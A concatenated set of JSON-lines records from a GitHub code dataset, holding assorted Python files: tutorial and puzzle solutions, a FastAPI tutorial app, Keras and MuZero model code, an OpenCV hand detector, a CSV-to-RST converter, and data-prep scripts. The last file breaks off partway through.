{0:5}\n","repo_name":"josejpalacios/codecademy-python3","sub_path":"Lesson 08: Dictionaries/Lesson 03: Code Challenges: Dictionaries/Challenge 08: Frequency Count.py","file_name":"Challenge 08: Frequency Count.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19078787822","text":"import time\nfrom utils.data_storage import DataStorage\n\n\nclass DataFile(DataStorage):\n def __init__(self, config):\n file_name = \"\"\n if config.getboolean('MAIN', 'store_together'):\n file_name = 'All_Tweets.json'\n super().__init__(config, file_name)\n\n def save(self, data, file_name):\n if not self._store_together:\n date_time = time.strftime(\"%Y-%m-%d\")\n file_name = date_time + \"_\" + file_name + \".json\"\n self._path_to_file = self._path + file_name\n with open(self._path_to_file, 'a') as f:\n f.write(str(data) + \"\\n\")\n\n def get_info(self):\n if self._store_together:\n return self._path_to_file\n else:\n return \"As json file in \" + self._path\n\n","repo_name":"ivosonntag/WennDasBierAlleIst","sub_path":"twitter/utils/data_file.py","file_name":"data_file.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28440060366","text":"\"\"\"\n\tAnderson Vieira's solution\n\tPlease don't copy this\n\"\"\"\nclass el:\n\tdef __init__(self, v, m):\n\t\tself.v = v\n\t\tself.m = m\n\n\tdef __lt__(self, other):\n\t\tms, mo = 0, 0\n\t\tif self.v < 0: ms = -((-self.v)%self.m)\n\t\telse: ms = self.v%self.m\n\n\t\tif other.v < 0: mo = -((-other.v)%self.m)\n\t\telse: mo = other.v%self.m\n\n\t\tif ms == mo:\n\t\t\tif self.v%2 != 0 and other.v%2 == 0:\n\t\t\t\treturn True\n\t\t\tif self.v%2 == 0 and other.v%2 != 0:\n\t\t\t\treturn False\n\t\t\tif self.v%2 == 0 and other.v%2 == 0:\n\t\t\t\treturn self.v < other.v\n\t\t\tif self.v%2 != 0 and other.v%2 != 0:\n\t\t\t\treturn self.v > other.v\n\t\treturn ms < mo\n\nn, m = map(int, input().split())\nwhile n != 0 and m != 0:\n\tarr = []\n\tfor i in range(n):\n\t\tx = int(input())\n\t\tarr.append(el(x, m))\n\n\tarr.sort()\n\tprint(n, m)\n\tfor i in range(n): print(arr[i].v)\n\tn, m = map(int, input().split())\nprint(n, m)","repo_name":"cap-nascimento/competitive-programming-solutions","sub_path":"uri/solutions/1000 - 1500/1252.py","file_name":"1252.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36180513844","text":"\"\"\"\nRun the Discord bot by running the directory.\n\"\"\"\n# Standard imports\nfrom os import getenv\n\n# Third party imports\nfrom dotenv import load_dotenv\n\n# Local imports\nfrom queue_bot import QueueBot, add_commands_to_bot\n\n\nif __name__ == '__main__':\n # Load in Discord token.\n load_dotenv()\n token = getenv('DISCORD_TOKEN')\n\n try:\n assert token is not None\n except AssertionError:\n raise EnvironmentError('No token found for the Discord bot in the .env file. Please see the readme for details.')\n\n # Create bot and run.\n bot = QueueBot(command_prefix='!')\n add_commands_to_bot(bot)\n bot.run(token)","repo_name":"alexandermjones/Discord-Queue-Bot","sub_path":"code/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40049371463","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nusage: cvt_csv_2_rst.py [-h] [-b ODOO_VER] [-m MAX_COL_WIDTH] [-n] [-q] [-V]\n [-v]\n src_file [dst_file]\n\nConvert csv file into xml file\n\npositional arguments:\n src_file\n dst_file\n\noptional arguments:\n -h, --help show this help message and exit\n -b ODOO_VER, --odoo-branch ODOO_VER\n -m MAX_COL_WIDTH, --max-col-width MAX_COL_WIDTH\n -n, --dry-run do nothing (dry-run)\n -q, --quiet silent mode\n -V, --version show program's version number and exit\n -v, --verbose verbose mode\n\"\"\"\n\nfrom __future__ import print_function, unicode_literals\nimport os\nimport sys\nimport time\nimport csv\nfrom os0 import os0\nfrom python_plus import _b, _c, _u\n\nif sys.version_info[0] == 2:\n from io import BytesIO\nelse:\n from io import StringIO\n\ntry:\n from z0lib import z0lib\nexcept ImportError:\n import z0lib\n\n\n__version__ = \"2.0.11\"\n\nmsg_time = time.time()\n\n\ndef msg_burst(text):\n global msg_time\n t = time.time() - msg_time\n if t > 3:\n print(text)\n msg_time = time.time()\n\n\ndef items_2_unicode(src):\n if isinstance(src, dict):\n for x in src.keys():\n src[x] = os0.u(src[x])\n elif isinstance(src, list):\n for i, x in enumerate(src):\n src[i] = os0.u(x)\n return src\n\n\ndef format_line(col_size, row, sep=None, flist=None):\n sep = sep or False\n flist = flist or row\n if sep:\n line = '+'\n else:\n line = '|'\n for i, p in enumerate(flist):\n if sep:\n line += '-' * (col_size[p] + 2)\n line += '+'\n elif isinstance(row, list):\n fmt_line = ' %%-%d.%ds |' % (col_size[p], col_size[p])\n line += fmt_line % row[i]\n else:\n fmt_line = ' %%-%d.%ds |' % (col_size[p], col_size[p])\n line += fmt_line % row[p]\n line += '\\n'\n return line\n\n\ndef convert_text(ctx, src_string):\n max_col_width = int(ctx['max_col_width'])\n csv.register_dialect(\n 'odoo', delimiter=_c(','), quotechar=_c('\\\"'), quoting=csv.QUOTE_MINIMAL\n )\n ctr = 0\n col_size = {}\n text = ''\n if sys.version_info[0] == 2:\n csv_fd = BytesIO(_b(src_string))\n else:\n csv_fd = StringIO(_u(src_string))\n hdr_read = False\n csv_obj = csv.DictReader(\n csv_fd, fieldnames=[], restkey='undef_name', dialect='odoo'\n )\n for row in csv_obj:\n if not hdr_read:\n csv_obj.fieldnames = items_2_unicode(row['undef_name'])\n for p in csv_obj.fieldnames:\n col_size[p] = min(len(p), 16)\n hdr_read = True\n continue\n if row[csv_obj.fieldnames[0]][0:4] == '.. $':\n pass\n else:\n for p in csv_obj.fieldnames:\n col_size[p] = max(col_size[p], min(len(row[p]), max_col_width))\n csv_fd.close()\n if sys.version_info[0] == 2:\n csv_fd = BytesIO(_b(src_string))\n else:\n csv_fd = StringIO(_u(src_string))\n hdr_read = False\n csv_obj = csv.DictReader(\n csv_fd, fieldnames=[], restkey='undef_name', dialect='odoo'\n )\n for row in csv_obj:\n if not hdr_read:\n row['undef_name'] = items_2_unicode(row['undef_name'])\n csv_obj.fieldnames = row['undef_name']\n hdr_read = True\n text += format_line(col_size, row['undef_name'], sep=True)\n text += format_line(col_size, row['undef_name'])\n text += format_line(col_size, row['undef_name'], sep=True)\n continue\n row = items_2_unicode(row)\n if row[csv_obj.fieldnames[0]][0:4] == '.. $':\n text += row[csv_obj.fieldnames[0]]\n text += '\\n'\n else:\n ctr += 1\n text += format_line(col_size, row, flist=csv_obj.fieldnames)\n text += format_line(col_size, row, sep=True, flist=csv_obj.fieldnames)\n csv_fd.close()\n return text\n\n\ndef convert_file(ctx):\n if os.path.isfile(ctx['src_file']):\n if ctx['opt_verbose']:\n print(\"Reading %s\" % ctx['src_file'])\n with open(ctx['src_file'], 'r') as fd:\n src_string = _u(fd.read())\n target = convert_text(ctx, src_string)\n if not ctx['dst_file']:\n ctx['dst_file'] = ctx['src_file'][0:-4] + '.rst'\n if ctx['dst_file'] == '/dev/tty':\n print(target)\n else:\n if ctx['opt_verbose']:\n print(\"Writing %s\" % ctx['dst_file'])\n with open(ctx['dst_file'], 'w') as fd:\n fd.write(_c(target))\n\n\ndef main(cli_args=None):\n # if not cli_args:\n # cli_args = sys.argv[1:]\n parser = z0lib.parseoptargs(\n \"Convert csv file into xml file\",\n \"© 2018-2023 by SHS-AV s.r.l.\",\n version=__version__,\n )\n parser.add_argument('-h')\n parser.add_argument('-b', '--odoo-branch', action='store', dest='odoo_ver')\n parser.add_argument(\n '-m', '--max-col-width', action='store', dest='max_col_width', default=\"250\"\n )\n parser.add_argument('-n')\n parser.add_argument('-q')\n parser.add_argument('-V')\n parser.add_argument('-v')\n parser.add_argument('src_file')\n parser.add_argument('dst_file', nargs='?')\n ctx = items_2_unicode(parser.parseoptargs(sys.argv[1:]))\n return convert_file(ctx)\n","repo_name":"zeroincombenze/tools","sub_path":"wok_code/scripts/cvt_csv_2_rst.py","file_name":"cvt_csv_2_rst.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"23109688171","text":"from argparse import ArgumentParser\nfrom common.load_data import load_flowers\nfrom common.util import decode_image_from_raw_bytes, merge_dict, read_raw_from_tar\nfrom common.util_keras import prepare_raw_bytes_for_model, reset_tf_session\nfrom keras.models import load_model\nfrom keras_model.image_classifier.hyperparams import get_constants\nfrom keras_model.image_classifier.model_setup import model_builder\nfrom keras_model.image_classifier.util import compile_model, train, train_generator\nimport matplotlib.pyplot as plt\nimport os\n\n\n# Training data\n# Takes 12 min and 400 MB.\n# * http://www.robots.ox.ac.uk/~vgg/data/flowers/102/index.html\n# * http://www.robots.ox.ac.uk/~vgg/data/flowers/102/102flowers.tgz\n# * http://www.robots.ox.ac.uk/~vgg/data/flowers/102/imagelabels.mat\n\n\ndef run(constant_overwrites):\n constants = merge_dict(get_constants(), constant_overwrites)\n tar_filename = constants['tar_filename']\n img_size = constants['img_size']\n\n train_files, test_files, train_labels, test_labels, n_classes = \\\n load_flowers(os.path.dirname(os.path.abspath(__file__)))\n data = {\n 'train_files': train_files,\n 'train_labels': train_labels,\n 'test_files': test_files,\n 'test_labels': test_labels,\n 'n_classes': n_classes\n }\n\n # test cropping\n raw_bytes = read_raw_from_tar(tar_filename, 'jpg/image_00001.jpg')\n img = decode_image_from_raw_bytes(raw_bytes)\n\n print('')\n print('original image shape:', img.shape)\n print('')\n plt.imshow(img)\n plt.show()\n\n img = prepare_raw_bytes_for_model(raw_bytes, img_size, normalize_for_model=False)\n print('')\n print('cropped image shape:', img.shape)\n print('')\n plt.imshow(img)\n plt.show()\n\n # remember to clear session if you start building graph from scratch!\n # don't call K.set_learning_phase() !!! (otherwise will enable dropout\n # in train/test simultaneously)\n _ = reset_tf_session() # returns session\n\n model = model_builder(n_classes, constants)\n\n print('')\n print(model.summary())\n print('')\n\n compile_model(model, constants)\n\n # model_file_exists = any(f.startswith('flowers') for f in os.listdir('.') if os.path.isfile(f))\n last_finished_epoch = constants['last_finished_epoch']\n if last_finished_epoch:\n model = load_model(constants['model_filename'].format(last_finished_epoch))\n\n train(model, data, constants)\n\n # Accuracy on test set\n test_accuracy = model.evaluate_generator(\n train_generator(tar_filename, test_files, test_labels, n_classes, constants),\n len(test_files) // constants['batch_size'] // 2\n )[1]\n\n print('\\nTest accuracy: %.5f' % test_accuracy)\n\n\nif __name__ == '__main__':\n # read args\n parser = ArgumentParser(description='Run Keras Image Classifier')\n parser.add_argument('--epochs', dest='n_epochs', type=int, help='number epochs')\n parser.add_argument('--last-finished-epoch', dest='last_finished_epoch', type=int,\n help='number of last finished epoch')\n parser.add_argument('--batch-size', dest='batch_size', type=int, help='batch size')\n parser.add_argument('--learning-rate', dest='learning_rate', type=float, help='learning rate')\n parser.add_argument('--tar-filename', dest='tar_filename', help='data tar filename')\n parser.add_argument('--imagenet', dest='use_imagenet', help='use imagenet flag', action='store_true')\n parser.set_defaults(use_imagenet=True)\n args = parser.parse_args()\n\n run(vars(args))\n","repo_name":"markmo/dltemplate","sub_path":"src/keras_model/image_classifier/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"21"} +{"seq_id":"34598089062","text":"import cv2\nimport numpy as np\nimport random as rd\nimport time\nimport pickle\nimport os\nimport tensorflow as tf\nimport sys\n\n\nclass Image_detector ():\n def __init__(self, show_boxes=True, thresh_rate=1, train_directory=None):\n self.train_dir=train_directory\n self.hand_cascade=cv2.CascadeClassifier(r'')\n self.list=[]\n self.show_boxes=show_boxes\n self.thresh_rate=thresh_rate\n self.crop_list=[]\n try:\n os.removedirs('images_folder')\n os.remove('predictions.bat')\n except Excetion as e:\n pass\n\n try:\n os.makedirs('images_folder')\n except Exception as e:\n pass\n self.image_processor()\n self.retrieve_data()\n\n def svae_images (self, frame):\n r=rd.randint(1, 1000)\n cv2.imwrite(\"images_folder\\\\hand_image{}.jpeg\".format(str(r)), frame)\n \n def detect (self, gray_image, orig_frame):\n hand=self.hand_cascade.detectMultiScale(gray_image,3, 2)\n for (x, y, w, h) in hand:\n if self.show_boxes==True:\n cv2.rectangle(orig_frame, (x,y), (x+w,y+h), (0,255,0), 2)\n self.list.append([x, y, w, h])\n time.sleep(self.thresh_rate)\n self.svae_images(orig_frame)\n else:\n self.list.extend([x, y, w, h])\n time.sleep(self.thresh_rate)\n self.svae_images(orig_frame)\n\n return orig_frame\n def image_processor (self):\n \"\"\"\n The function where the model gets the frame of the webcame and preprocesses it to\n the detect function\n\n Returns:\n [type]: [description]\n \"\"\"\n vid=cv2.VideoCapture(0)\n\n while True:\n nothing, frame=vid.read()\n gray_scale=cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n \n our_reslut=self.detect(gray_image=gray_scale, orig_frame=frame)\n cv2.imshow('vidheo', our_reslut)\n\n if cv2.waitKey(1) & 0xFF == ord('q'): \n break\n\n vid.release()\n cv2.destroyAllWindows()\n return self.list\n\n def retrieve_data (self):\n self.file_handler()\n with open('predictions.bat', 'rb') as f:\n while True:\n try:\n ans=pickle.load(f)\n self.crop_list.append(ans.split('-'))\n except EOFError:\n break\n self.crop_images()\n\n def crop_images(self):\n os.makedirs('data_full')\n for m in range (len(self.crop_list)):\n data=self.crop_list[m][0]\n\n new_image=cv2.imread(data)\n y=int(self.crop_list[m][2])\n x=int(self.crop_list[m][1])\n h=int(self.crop_list[m][4])\n w=int(self.crop_list[m][3])\n \n new_img=new_image[y:y+h, x:x+w]\n os.remove(data)\n cv2.imwrite(data, new_img)\n\n\n def file_handler (self):\n \"\"\"\n This is a function that appends the data to the `predictions.bat` file\n ehich contains the essential info for the cropping of the image\n\n \"\"\"\n with open('predictions.bat', 'wb') as f:\n for (roots, dirs, files) in os.walk('images_folder'):\n for i in range (len(files)):\n images='images_folder'+'\\\\'+files[i]\n print (self.list[i])\n resluts=f\"{images}-{self.list[i][0]}-{self.list[i][1]}-{self.list[i][2]}-{self.list[i][3]}\"\n pickle.dump(resluts, f)\n f.close()\n\n def model_preds (self, model_path):\n \"\"\"\n This model helps in predicting the cropped images lists, \n and writing it into a batch file.\n\n Args:\n model_path ([path]): The path were the model has been saved\n \"\"\"\n\n f=open('predictions_model.bat', 'wb')\n\n model=tf.keras.load_model(model_path)\n\n for i in range (len(files) for _,_,files in os.walk('images_folder')):\n \n image=tf.io.read_file('images_folder\\\\'+files[i])\n image=tf.image.decode_image(image)\n image=tf.image.resize(images=image, size=(200, 200))\n image=image/255.\n \n classes=sorted(os.listdir(self.train_dir))\n preds=model.predict(image)\n preds=classes[tf.round(preds.argmax())]\n\n answer=f\"images_folder\\\\{files[i]}:{preds}\"\n pickle.dump(answer, f)\n f.close()\n\na=Image_detector(thresh_rate=0.5)\n","repo_name":"Chiraagkv/ASL","sub_path":"progress_files/Image_cap.py","file_name":"Image_cap.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"41799025476","text":"from tensorflow import keras\n\nkl = keras.layers\n\n\"\"\"\nPaper\nhttps://arxiv.org/abs/1911.08265\n\nRef\nhttps://github.com/horoiwa/deep_reinforcement_learning_gallery\n\"\"\"\n\n\nclass MuZeroAtariBlock(keras.Model):\n def __init__(\n self,\n filters: int = 128,\n kernel_size=(3, 3),\n l2: float = 0.0001,\n use_layer_normalization: bool = True,\n **kwargs,\n ):\n super().__init__(**kwargs)\n\n self.conv1 = kl.Conv2D(\n filters,\n kernel_size=kernel_size,\n strides=2,\n padding=\"same\",\n activation=\"relu\",\n use_bias=False,\n kernel_initializer=\"he_normal\",\n kernel_regularizer=keras.regularizers.l2(l2),\n )\n self.resblock1 = _ResidualBlock(filters, kernel_size, l2, use_layer_normalization)\n self.resblock2 = _ResidualBlock(filters, kernel_size, l2, use_layer_normalization)\n self.conv2 = kl.Conv2D(\n filters * 2,\n kernel_size=kernel_size,\n strides=2,\n padding=\"same\",\n activation=\"relu\",\n use_bias=False,\n kernel_initializer=\"he_normal\",\n kernel_regularizer=keras.regularizers.l2(l2),\n )\n self.resblock3 = _ResidualBlock(filters * 2, kernel_size, l2, use_layer_normalization)\n self.resblock4 = _ResidualBlock(filters * 2, kernel_size, l2, use_layer_normalization)\n self.resblock5 = _ResidualBlock(filters * 2, kernel_size, l2, use_layer_normalization)\n self.pool1 = kl.AveragePooling2D(pool_size=3, strides=2, padding=\"same\")\n self.resblock6 = _ResidualBlock(filters * 2, kernel_size, l2, use_layer_normalization)\n self.resblock7 = _ResidualBlock(filters * 2, kernel_size, l2, use_layer_normalization)\n self.resblock8 = _ResidualBlock(filters * 2, kernel_size, l2, use_layer_normalization)\n self.pool2 = kl.AveragePooling2D(pool_size=3, strides=2, padding=\"same\")\n\n def call(self, x):\n x = self.conv1(x)\n x = self.resblock1(x)\n x = self.resblock2(x)\n x = self.conv2(x)\n x = self.resblock3(x)\n x = self.resblock4(x)\n x = self.resblock5(x)\n x = self.pool1(x)\n x = self.resblock6(x)\n x = self.resblock7(x)\n x = self.resblock8(x)\n x = self.pool2(x)\n return x\n\n\nclass _ResidualBlock(keras.Model):\n def __init__(\n self,\n filters,\n kernel_size,\n l2,\n use_layer_normalization: bool = True,\n **kwargs,\n ):\n super().__init__(**kwargs)\n\n self.conv1 = kl.Conv2D(\n filters=filters,\n kernel_size=kernel_size,\n padding=\"same\",\n use_bias=False,\n kernel_initializer=\"he_normal\",\n kernel_regularizer=keras.regularizers.l2(l2),\n )\n if use_layer_normalization:\n self.bn1 = kl.LayerNormalization()\n else:\n self.bn1 = kl.BatchNormalization()\n self.relu1 = kl.ReLU()\n self.conv2 = kl.Conv2D(\n filters=filters,\n kernel_size=kernel_size,\n padding=\"same\",\n use_bias=False,\n kernel_initializer=\"he_normal\",\n kernel_regularizer=keras.regularizers.l2(l2),\n )\n if use_layer_normalization:\n self.bn2 = kl.LayerNormalization()\n else:\n self.bn2 = kl.BatchNormalization()\n self.relu2 = kl.ReLU()\n\n def call(self, x):\n x1 = self.conv1(x)\n x1 = self.bn1(x1)\n x1 = self.relu1(x1)\n x1 = self.conv2(x1)\n x1 = self.bn2(x1)\n x = x + x1\n x = self.relu2(x)\n return x\n","repo_name":"pocokhc/simple_distributed_rl","sub_path":"srl/rl/models/alphazero/tf/muzero_atari_block.py","file_name":"muzero_atari_block.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"11765460529","text":"import enum\nimport typing\n\nimport fastapi\nimport uvicorn\nimport pydantic\n\n\nclass ModelName(str, enum.Enum):\n alexnet = 'alexnet'\n resnet = 'resnet'\n letnet = 'letnet'\n\n\nclass Item(pydantic.BaseModel):\n name: str\n description: typing.Optional[str] = None\n price: float\n tax: typing.Optional[float] = None\n\n\napp = fastapi.FastAPI()\n\n\nfake_items_db = [\n {'item_name': 'Foo'},\n {'item_name': 'Bar'},\n {'item_name': 'Baz'},\n]\n\n\n@app.get('/')\nasync def root():\n return {'message': 'Hello World'}\n\n\n@app.get('/items/{item_id}')\nasync def item(item_id: int):\n return {'item_id': item_id}\n\n\n@app.get('/users/me')\nasync def read_user_me():\n return {'user_id': 'the current user'}\n\n\n@app.get('/users/{user_id}')\nasync def read_user(user_id: str):\n return {'user_id': user_id}\n\n\n@app.get('/models/{model_name}')\nasync def get_model(model_name: ModelName):\n if model_name == ModelName.alexnet:\n return {'model_name': model_name, 'message': 'Deep Learning FTW!'}\n\n if model_name.value == 'letnet':\n return {'model_name': model_name, 'message': 'LeCNN all the images'}\n\n return {'model_name': model_name, 'message': 'Have some residuals'}\n\n\n@app.get('/files/{file_path:path}')\nasync def read_file(file_path: str):\n return {'file_path': file_path}\n\n\n@app.get('/items/')\nasync def read_item(skip: int = 0, limit: int = 10):\n return fake_items_db[skip: skip + limit]\n\n\n@app.get('/users/{user_id}/items/{item_id}')\nasync def read_item_query(\n user_id: int,\n item_id: str,\n q: typing.Optional[str] = None,\n short: bool = False\n):\n item = {'item_id': item_id, 'owner_id': user_id}\n if q:\n item.update({'q': q})\n if not short:\n item.update(\n {\n 'description': (\n 'This is an amazing item that has a long description'\n )\n }\n )\n return item\n\n\n@app.get('/items_user/{item_id}')\nasync def read_user_item(\n item_id: str,\n needy: str,\n skip: int = 0,\n limit: typing.Optional[int] = None\n):\n return {'item_id': item_id, 'needy': needy, 'skip': skip, 'limit': limit}\n\n\n@app.post('/items/')\nasync def create_item(item: Item):\n item_dict = item.dict()\n\n if item.tax:\n price_with_tax = item.price + item.tax\n item_dict.update({'price_with_tax': price_with_tax})\n return item_dict\n\n\n@app.put('/items/{item_id}')\nasync def update_item(item_id: int, item: Item, q: typing.Optional[str] = None):\n result = {'item_id': item_id, **item.dict()}\n if q:\n result.update({'q': q})\n return result\n\n\n@app.get('/read_items/')\nasync def read_items(\n q: typing.Optional[str] = fastapi.Query(None, min_length=3, max_length=10)\n):\n results = {'items': [{'item_id': 'Foo'}, {'item_id': 'Bar'}]}\n if q:\n results.update({'q': q})\n return results\n\n\n@app.get('/cnpj/')\nasync def read_items(\n cnpj: str = fastapi.Query(..., regex='^\\d{2}\\.\\d{3}\\.\\d{3}/\\d{4}\\-\\d{2}$')\n):\n return {'cnpj': cnpj}\n\n\n@app.get('/cnpjs/')\nasync def cnpjs(c: typing.Optional[typing.List[str]] = fastapi.Query(None)):\n return {'c': c}\n\n\n@app.get('/cpfs/')\nasync def cpfs(c: typing.List[str] = fastapi.Query(['456', '123'])):\n return {'c': c}\n\n\n@app.get('/xelo/')\nasync def cpfs(\n c: typing.Optional[str] = fastapi.Query(\n None,\n title='cnjs',\n description='cnjs numbers',\n alias='item-query',\n deprecated=True\n ),\n):\n return {'c': c}\n\n\nif __name__ == '__main__':\n uvicorn.run('app:app', reload=True, debug=True)\n","repo_name":"RonaldTheodoro/fastapi-tutorial","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18749555858","text":"#!/usr/bin/env python3\n# https://www.hackerrank.com/challenges/py-collections-ordereddict\n# #python\n\nimport collections\nimport io\nimport sys\nimport unittest\n\n\ndef aggregate(purchases):\n aggregated = collections.OrderedDict()\n for product, payment in purchases:\n if product in aggregated:\n aggregated[product] += payment\n else:\n aggregated[product] = payment\n return aggregated\n\n\ndef main():\n n = int(input().strip())\n purchases = []\n for _ in range(n):\n items = input().strip().split()\n product = ' '.join(items[:-1])\n payment = int(items[-1])\n purchases.append((product, payment))\n aggregated = aggregate(purchases)\n for product in aggregated:\n print('%s %d' % (product, aggregated[product]))\n\n\nif __name__ == '__main__': # pragma: no cover\n main()\n\n\nclass TestCode(unittest.TestCase):\n def generalized_test(self, which):\n sys.stdin = open(__file__.replace('.py', f'.{which}.in'), 'r')\n sys.stdout = io.StringIO()\n expected = open(__file__.replace('.py', f'.{which}.out'), 'r')\n main()\n self.assertEqual(sys.stdout.getvalue(), expected.read())\n for handle in [sys.stdin, sys.stdout, expected]:\n handle.close()\n\n def test_0(self):\n self.generalized_test('0')\n","repo_name":"altermarkive/training","sub_path":"algorithms/code/hackerrank/py_collections_ordereddict/test_py_collections_ordereddict.py","file_name":"test_py_collections_ordereddict.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"26279543915","text":"import argparse\nfrom collections import Counter\nfrom qair.data.utils import create_path, list_files\nfrom qair.data.dataset import QAdataset\nfrom itertools import chain\nimport logging\n\ndef giff_words(dataset, lower=True):\n\n def process(x):\n if lower:\n return x.lower().split()\n else:\n return x.split()\n\n for ex in dataset.iterator():\n for word in chain(process(ex.question), process(ex.passage)):\n yield word\n\n\n\nif __name__=='__main__':\n logging.basicConfig(format='%(asctime)s %(message)s', level=logging.DEBUG)\n logging.info('-'*50)\n parser = argparse.ArgumentParser(description='Create the vocabulary')\n parser.add_argument(\"dataset\", help=\"dataset name\")\n parser.add_argument(\"--only_train\", dest='onlytrain', help=\"lowercased\", action='store_true')\n parser.add_argument('--lower', dest='lower', help=\"lowercased\", action='store_true')\n parser.add_argument('--top_n', dest='n', help=\"the max number of words to keep\", type=int)\n args = parser.parse_args()\n\n def process(dataset, lower=True):\n datasets = []\n inp_path = f'data/parsed/{dataset}/'\n for inp_file, _ in list_files(inp_path, inp_path):\n if not args.onlytrain or inp_file.endswith('train.json'):\n datasets.append(QAdataset(inp_file))\n return Counter(chain(*(giff_words(dataset, lower) for dataset in datasets)))\n\n vocabulary = process(args.dataset, args.lower)\n with open(create_path(f'data/info/{args.dataset}/vocab.tsv'), 'w') as ofile:\n top_n = vocabulary.most_common(args.n)\n logging.info(f'{args.dataset}: {len(top_n)} words')\n for word, freq in vocabulary.most_common(args.n):\n ofile.write(f'{word}\\t{freq}\\n')\n\n","repo_name":"dbonadiman/qa-ir","sub_path":"qair/data/vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1154201473","text":"#%% [markdown]\n# Stage 3 - Join Data\n\n# ## Common\n# So this is where we are trying to do all the common stuff to ingest all of the files. Key is recognition that there are common patterns we can exploit across the files.\n# NOTE - still to figure out how to do this from a single file and import it successfully.\n\n#%%\n# Import all of the libraries we need to use...\nimport pandas as pd\nimport azureml.dataprep as dprep\nimport seaborn as sns\nimport os as os\nimport re as re\nimport collections\nfrom azureml.dataprep import value\nfrom azureml.dataprep import col\nfrom commonCode import savePackage, openPackage, createFullPackagePath\n\n# Path to the source data\ndataPath = \"./data\"\n\n# Path to the location where the dataprep packags that are created\npackagePath = \"./packages\"\n\n# Name of package file\npackageFileSuffix = \"_package.dprep\"\n\n#%% [markdown]\n# ## Open PEOPLE and MEMBERS data flows from stage 2\n# Simply pick up the data flows from stage 2...\n\n#%%\npeopleDataFlow = openPackage('PEOPLE', '2', 'A')\nmembersDataFlow = openPackage('MEMBERS', '2', 'A')\n\n#%% [markdown]\n# ## Join the PEOPLE and MEMBERS data flows\n# Crunch time! Let's see if we can get these cleaned up data sets to join.\n\n#%%\njoin_builder = peopleDataFlow.builders.join(right_dataflow=membersDataFlow, left_column_prefix='l', right_column_prefix='r')\njoin_builder.detect_column_info()\njoin_builder\n\n#%%\njoin_builder.generate_suggested_join()\njoin_builder.list_join_suggestions()\n\n#%% [markdown]\n# Weird, it doesn't come up with a suggestion despite having two MEMNO integer columns to work with!\n\n#%%\njoinedDataFlow = dprep.Dataflow.join(left_dataflow=peopleDataFlow,\n right_dataflow=membersDataFlow,\n join_key_pairs=[('ID', 'PEOPLEID')],\n left_column_prefix='PEOPLE_',\n right_column_prefix='MEMBERS_')\n\n#%%\njoinedDataFlow.head(5)\n\n#%%\njoinedDataFlow.get_profile()\n\n#%% [markdown]\n# Just running a couple of checks now to see how well the join has worked:\n\n#%%\nprint('PEOPLE row count = {0}'.format(peopleDataFlow.row_count))\nprint('MEMBERS row count = {0}'.format(membersDataFlow.row_count))\nprint('JOINED row count = {0}'.format(joinedDataFlow.row_count))\n\n#%%\norphanedPeopleDataFlow = joinedDataFlow.filter(joinedDataFlow['MEMBER_PEOPLEID'] == None)\norphanedPeopleDataFlow.head(20)\n\n#%% [markdown]\n# ## Save JOINED data\n# Finally save the JOINED data flow that comes out of stage 3 for consumption downstream\n\n#%%\nfullPackagePath = savePackage(joinedDataFlow, 'JOINED', '3', 'A')\nprint('Saved package to file {0}'.format(fullPackagePath))\n\n","repo_name":"Smartitect/dataprep","sub_path":"scratches/notebook99_joinData.py","file_name":"notebook99_joinData.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"11872105579","text":"import os\nimport cv2\nimport h5py\nimport random\nimport argparse\nimport numpy as np\nimport subprocess as sp\n\nimport torch\nimport torch.nn.functional as F\nimport torchvision.transforms as transforms\nfrom torch.utils.data import Dataset, DataLoader\n\nfrom PIL import Image\nfrom tensorboardX import SummaryWriter\nfrom sklearn import metrics\nfrom sklearn.cluster import MiniBatchKMeans\nfrom exploring_exploration.models.reconstruction import FeatureNetwork\n\n\nclass RGBDataset(Dataset):\n def __init__(\n self, dataset_root, seed=123, transform=None, image_size=256, truncate_count=-1,\n ):\n random.seed(seed)\n self.dataset_root = dataset_root\n images = (\n sp.check_output(f\"ls {dataset_root}\", shell=True)\n .decode(\"utf-8\")\n .split(\"\\n\")[:-1]\n )\n ndata = len(images)\n if truncate_count > 0:\n ndata = min(ndata, truncate_count)\n\n self.image_size = image_size\n\n self.dataset = [os.path.join(dataset_root, image) for image in images]\n\n random.shuffle(self.dataset)\n self.dataset = self.dataset[:ndata]\n\n # Data transform\n self.transform = transform if transform is not None else lambda x: x\n\n self.nimgs = ndata\n\n def __getitem__(self, index):\n path = self.dataset[index]\n img = Image.open(path).convert(\"RGB\")\n img = self.transform(img)\n\n return {\"rgb\": img}, {\"rgb\": path}\n\n def __len__(self):\n return self.nimgs\n\n\ndef main(args):\n # Enable cuda by default\n args.cuda = True\n\n 